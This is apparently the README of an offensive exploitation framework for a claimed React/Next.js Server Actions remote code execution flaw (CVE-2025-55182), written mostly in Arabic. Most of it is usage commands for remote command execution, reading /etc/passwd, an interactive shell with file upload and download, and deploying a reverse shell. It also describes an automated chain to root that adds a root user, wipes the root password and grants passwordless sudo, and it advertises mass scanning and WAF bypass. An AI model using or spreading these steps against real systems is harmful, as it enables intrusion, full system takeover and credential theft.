مجموعة أدوات استغلال متطورة لـ CVE-2025-55182 (ثغرة تنفيذ الأوامر في مكونات خادم React). حمولات متعددة الأشكال غير متزامنة، تجاوز متقدم لجدار الحماية وشبكة توصيل المحتوى (WAF/CDN)، تدوير الوكيل، مسح جماعي عبر Shodan/Censys، اختراق تلقائي مع قذائف عكسية، قوالب Nuclei، مختبر K8s ولوحة تحكم C2. من تأليف Sudeepa Wanigarathna – مخصصة فقط لاختبار الاختراق والاختبارات الأمنية المصرح بها.
██████╗ ███████╗██████╗ ██████╗ ███████╗██████╗ ██╗ ██╗
██╔════╝ ██╔════╝██╔══██╗██╔══██╗██╔════╝██╔══██╗██║ ██║
██║ █████╗ ██████╔╝██████╔╝█████╗ ██████╔╝██║ ██║
██║ ██╔══╝ ██╔══██╗██╔══██╗██╔══╝ ██╔══██╗██║ ██║
╚██████╗ ███████╗██║ ██║██████╔╝███████╗██║ ██║╚██████╔╝
╚═════╝ ╚══════╝╚═╝ ╚═╝╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝
React2Shell Exploitation Framework v1.0
Author: Sudeepa Wanigarathna
إطار عمل استغلال احترافي لثغرة تنفيذ الأكواد عن بُعد في Next.js Server Actions (React2Shell). يوضح سلسلة الهجوم الكاملة من الوصول الأولي إلى تصعيد الصلاحيات إلى صلاحيات الجذر.
الإمكانيات:
# فحص الثغرة
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check
# تنفيذ أمر
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id"
python3 interactive_shell.py --target http://127.0.0.1:3000
# استغلال كامل: RCE ← التعداد ← الوصول إلى الجذر
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root
Cerberus-React2Shell-Hades/
├── react2shell_exploit.py # محرك الاستغلال الأساسي (400+ سطر)
├── demo_exploit.py # سلسلة الهجوم الآلي (290+ سطر)
├── interactive_shell.py # الصدفة التفاعلية (280+ سطر)
├── reverse_shell_handler.py # مستمع الصدفة العكسية (180+ سطر)
├── post_exploit/
│ ├── linux_enum.py # تعداد النظام (330+ سطر)
│ ├── priv_esc.py # تصعيد الصلاحيات (320+ سطر)
│ └── __init__.py
├── EXPLOITATION_GUIDE.md # توثيق الاستخدام الكامل
├── QUICKSTART.md # مرجع سريع
└── BANNER.txt
# فحص الثغرة
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check
# تنفيذ الأوامر
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "whoami"
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "cat /etc/passwd"
# متغيرات حمولة مختلفة
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --variant spawn
# مع الإخفاء
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --obfuscate
# تشغيل الصدفة
python3 interactive_shell.py --target http://127.0.0.1:3000
# الأوامر المتاحة:
# - execute <cmd> : تنفيذ أمر صدفة
# - enum : تشغيل تعداد كامل
# - escalate : محاولة تصعيد الصلاحيات
# - upload <local> <remote> : رفع ملف
# - download <remote> <local>: تنزيل ملف
# - shell <lhost> <lport>: نشر صدفة عكسية
# - info : عرض معلومات الجلسة
# - exit : خروج
# الطرفية 1: تشغيل المستمع
python3 reverse_shell_handler.py --lport 4444
# الطرفية 2: نشر الصدفة
python3 react2shell_exploit.py --target http://127.0.0.1:3000 \
--revshell --lhost 127.0.0.1 --lport 4444 --shell-type bash
# السلسلة الكاملة: الاكتشاف ← RCE ← التعداد ← الجذر
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root
ينفذ الإطار سلسلة استغلال كاملة من 6 خطوات:
id/etc/shadow وسرد /rootثنائيات SUID (GTFOBins)
ملفات /etc القابلة للكتابة
/etc/passwd - إضافة مستخدم جذر جديد/etc/shadow - مسح كلمة مرور الجذر/etc/sudoers - منح صلاحية sudo بدون كلمة مرور (NOPASSWD)الهروب من Docker
استغلالات النواة
صلاحيات Linux
pip install -r requirements.txt
التبعيات:
EXPLOITATION_GUIDE.md - دليل الاستخدام الكامل مع الأمثلةQUICKSTART.md - مرجع سريع للأوامر الشائعةتحذير: هذه الأداة مخصصة لاختبارات الأمان المصرح بها فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. استخدمها فقط على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها.
المؤلف غير مسؤول عن أي إساءة استخدام لهذه الأداة. استخدمها على مسؤوليتك الخاصة.
صُمم هذا الإطار من أجل:
MIT License (لأغراض تعليمية فقط)
Sudeepa Wanigarathna
الإصدار: 1.0
آخر تحديث: ديسمبر 2025
للحصول على تعليمات الاستخدام التفصيلية، راجع EXPLOITATION_GUIDE.md